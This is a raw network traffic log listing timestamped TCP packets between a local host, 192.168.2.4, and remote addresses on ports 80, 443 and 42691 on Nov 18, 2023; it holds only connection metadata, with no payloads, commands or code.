Nov 18, 2023 10:02:37.157434940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157450914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157453060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157466888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157481909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157489061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157497883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157512903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157514095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157532930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157550097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157563925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157567978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157584906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157599926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157603979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157622099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157624960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157638073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157644033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157655954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157672882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157681942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157689095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157706022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157717943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157725096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157741070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157759905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157763004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157776117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157793999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157804012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157810926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157820940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157828093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157845020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157856941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157860994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157881975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157896042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157897949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157917023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157934904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157941103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157953024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157970905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157978058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157988071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157999992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158004999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158021927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158035040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158039093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158056021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158071995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158081055 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158088923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158103943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158107042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158126116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158142090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158149004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158159971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158175945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158185005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158194065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158202887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158210993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158229113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158241987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158245087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158262968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158279896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158282995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158296108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158307076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158313036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158329010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158345938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158354044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158363104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158379078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158394098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158401966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158410072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158418894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158435106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158447981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158451080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158467054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158483028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158483028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158499956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158507109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158516884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158533096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158549070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158559084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158565044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158581018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158592939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158597946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158613920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158613920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158631086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158647060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158652067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158663988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158680916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158694029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158698082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158714056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158714056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158730984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158747911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158747911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158763885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158780098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158787012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158797026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158812046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158813953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158832073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158844948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158847094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158864021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158880949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.158885002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.158905983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.184907913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.186644077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.191715956 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.191906929 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.192118883 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.215464115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.221194983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.221215010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.221282005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.259835005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.365670919 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.365832090 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.365920067 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.365956068 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.365994930 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366080046 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366142035 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.366151094 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366192102 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.366198063 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366292953 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366343975 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.366350889 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366436958 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.366486073 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.366492033 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.422931910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.422986031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423003912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423022032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423048019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423083067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423309088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423326015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423386097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423414946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423432112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423449993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423466921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423485041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423496962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423501968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423520088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423536062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423536062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423554897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423557997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423573017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423595905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423599005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423615932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.423629045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.423664093 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424010038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424027920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424086094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424128056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424145937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424161911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424190044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424211025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424227953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424245119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424256086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424262047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424272060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424288988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424290895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424313068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424367905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424388885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424406052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424422979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424432993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424441099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424483061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424504042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424509048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424525976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424541950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424557924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424571037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424576044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424592972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424609900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424618959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424628973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424644947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424649954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424660921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424665928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424678087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424695969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424710989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424720049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424727917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424742937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424755096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424761057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424777031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424777985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424793959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424810886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424812078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424827099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424843073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424849987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424860954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424871922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424876928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424892902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424910069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424917936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424927950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424945116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424954891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424962044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424977064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.424978971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.424994946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425009012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425014019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425030947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425041914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425050020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425065994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425087929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425121069 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425122023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425138950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425156116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425173044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425183058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425223112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425230980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425256014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425271988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425290108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425302982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425307035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425333023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425381899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425398111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425414085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425430059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425437927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425446987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425465107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425476074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425498962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425506115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425523043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425539017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425554991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425561905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425570965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425590038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.425595999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425617933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.425836086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.434716940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435348034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435442924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435467005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435506105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435523033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435539007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435539961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435555935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435574055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435580969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435590029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435606956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435621023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435622931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435641050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435642958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435656071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435672998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435679913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435688972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.435713053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.435734034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.436335087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436352968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436713934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436758041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.436778069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436795950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436824083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.436829090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436875105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.436918020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436935902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436953068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436980009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436997890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.436999083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437015057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437032938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437069893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437074900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437093019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437108994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437125921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437143087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437149048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437160969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437177896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437176943 CET	49744	80	192.168.2.4	194.49.94.120
